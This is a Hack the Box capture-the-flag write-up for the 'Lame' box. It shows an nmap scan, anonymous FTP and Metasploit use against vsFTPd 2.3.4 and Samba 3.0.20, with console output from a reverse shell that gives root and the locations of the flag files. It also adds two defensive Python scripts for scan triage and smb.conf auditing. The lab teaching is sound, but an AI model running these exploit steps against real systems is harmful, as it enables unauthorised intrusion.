Hack the box - Lame

Mar 15, 2019 10:32 · 643 words · 4 minute read tutorial writeup ctf

Hack the box

Hack the box is a website that hosts vulnerable servers called "boxes". It's a very nice playground to learn about cybersecurity and hacking. As I am just beginning to learn the field, my first box will be the easiest one.


I am using Parrot OS in a VM via VirtualBox.

Connecting to HTB VPN

We first need to connect to the Hack the box network before we can access any box. On the Hack the box website, go to Access and download the connection pack. Then simply run

openvpn yourName.ovpn

You can verify your connection by pinging a box.

Nmap

The first thing to do is a port scan with nmap. Let's use zenmap to get a nice GUI, but you can also run the command nmap -T4 -A -v 10.10.10.3 in your shell.


Several ports are open, including SSH, FTP and a Samba server.

Anonymous FTP

We notice in the nmap output that an FTP server is running and accepts anonymous connections: |_ftp-anon: Anonymous FTP login allowed (FTP code 230)

We connect to it with ftp 10.10.10.3. However, we quickly see that this leads nowhere: the directory is empty.
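The two things the scan above gives us that matter most are the NSE script line about anonymous FTP and the service version strings. As an added example (not part of the original writeup), the following Python script parses a constructed nmap normal-output fragment modelled on this box and turns it into a short list of findings a defender would act on: anonymous FTP enabled, and service versions for which this writeup shows Metasploit has modules (vsFTPd 2.3.4, Samba 3.0.20). The SSH version string and the exact layout of the sample are assumptions; the lookup table is deliberately tiny and is meant to be extended.

```python
import re

# Constructed sample of nmap -A normal output for the box in this writeup.
# Hand-written for the example; the SSH version is a placeholder, not a scan result.
SAMPLE_NMAP_OUTPUT = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
"""

# "21/tcp   open  ftp   vsftpd 2.3.4"
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)
# "|_ftp-anon: ..." or "| ftp-anon: ..." (first or only line of an NSE script result);
# continuation lines start with "|   " and are intentionally not matched.
SCRIPT_RE = re.compile(r"^\|(?:_| )(?P<script>[\w-]+):\s*(?P<text>.*)$")

# Version prefixes this writeup shows Metasploit modules for, with the fix a
# defender would apply. Assumed/constructed lookup, kept small on purpose.
KNOWN_ISSUES = {
    "vsftpd 2.3.4": "vsFTPd 2.3.4: a backdoor exploit module exists; upgrade to a supported release",
    "Samba smbd 3.0.20": "Samba 3.0.20: 'username map script' command execution module exists; upgrade Samba",
}


def parse_nmap(text):
    """Return a list of open-port records, each with its NSE script lines attached."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["port"] = int(rec["port"])
            rec["scripts"] = {}
            ports.append(rec)
            continue
        s = SCRIPT_RE.match(line)
        if s and ports:  # script output belongs to the most recent port line
            ports[-1]["scripts"][s.group("script")] = s.group("text")
    return ports


def triage(ports):
    """Produce (port, finding) tuples for anonymous FTP and known-weak versions."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        anon = p["scripts"].get("ftp-anon", "")
        if p["service"] == "ftp" and "Anonymous FTP login allowed" in anon:
            findings.append((p["port"], "anonymous FTP login allowed; disable anonymous_enable or restrict it"))
        for prefix, note in KNOWN_ISSUES.items():
            if p["version"].startswith(prefix):
                findings.append((p["port"], note))
    return findings


if __name__ == "__main__":
    for port, note in triage(parse_nmap(SAMPLE_NMAP_OUTPUT)):
        print("%d/tcp: %s" % (port, note))
```

On the sample above this reports three findings: anonymous FTP on 21, the vsFTPd version on 21, and the Samba version on 445. Feeding it a real scan is a matter of passing the contents of nmap's -oN file instead of the constructed string.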

Metasploit

Let's now use Metasploit to find out whether these services have known vulnerabilities.

We start the Metasploit database and run the console.

sudo msfdb start
msfconsole

vsftpd

Now let's search for vsftpd.

msf5 > search vsftpd 2.3.4

Matching Modules
================

Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials
exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution
exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution

The module exploit/unix/ftp/vsftpd_234_backdoor looks interesting, let's try it.

msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 21 yes The target port (TCP)


Exploit target:

Id Name
-- ----
0 Automatic


msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

Hmm, it does not work 🤷

Well, there is still the Samba server. Now we search for its version, 3.0.20.

Samba

msf5 > search 3.0.20

Matching Modules
================

Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/admin/http/wp_easycart_privilege_escalation 2015-02-25 normal Yes WordPress WP EasyCart Plugin Privilege Escalation
exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution

The username map script module seems neat.

msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 139 yes The target port (TCP)


Exploit target:

Id Name
-- ----
0 Automatic


msf5 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 10.10.14.61:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 3UeV43XcRvmHR6Ce;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "3UeV43XcRvmHR6Ce\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.61:4444 -> 10.10.10.3:41473) at 2019-03-16 07:05:50 -0400

ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
shell
[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
pwd
pwd
/
sh-3.2#

Bingo, we now have a shell and can simply find the flags. Spoiler alert: cat the files /home/makis/user.txt and /root/root.txt.
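The Samba module above only works because the server's smb.conf sets the username map script option, so the directive is what an administrator should look for on their own hosts. As an added example (not from the writeup or from the Samba project), this Python script parses a constructed smb.conf fragment the way smbd reads it (comments with # or ; ignored, keys case- and whitespace-insensitive) and reports whether the global section still carries the directive. The sample config, the script path in it and the audit wording are assumptions.

```python
# Constructed smb.conf fragment for the example; not the box's real configuration.
SAMPLE_SMB_CONF = """\
# Samba configuration (constructed sample)
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba %v)
   Username Map   Script = /etc/samba/scripts/mapusers.sh
   ; security = user

[homes]
   comment = Home Directories
   browseable = no
"""


def parse_smb_conf(text):
    """Parse smb.conf into {section: {key: value}}.

    Mirrors smbd's loose parsing: blank lines and lines starting with '#' or ';'
    are comments, section names are case-insensitive, and a key's internal
    whitespace and case are not significant ("Username Map Script" ==
    "username map script").
    """
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            key, _, value = line.partition("=")
            key = " ".join(key.split()).lower()
            sections[current][key] = value.strip()
    return sections


def audit_username_map_script(sections):
    """Return a list of findings; empty means the risky directive is absent."""
    findings = []
    script = sections.get("global", {}).get("username map script")
    if script is not None:
        findings.append(
            "username map script is set to %r: smbd runs this script with the "
            "client-supplied username on every login, so it must be removed "
            "unless Samba is patched and the script strictly validates its input" % script
        )
    return findings


if __name__ == "__main__":
    problems = audit_username_map_script(parse_smb_conf(SAMPLE_SMB_CONF))
    print("\n".join(problems) if problems else "no username map script directive found")
```

Removing the line from the sample (or commenting it out with ;) makes the audit return an empty list, which is the state a hardened host should be in; on a real box you would pass the contents of /etc/samba/smb.conf and then confirm the running Samba version is a supported one, since the directive alone is not the whole story.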

Voilà, the Lame box is now done. Good job!
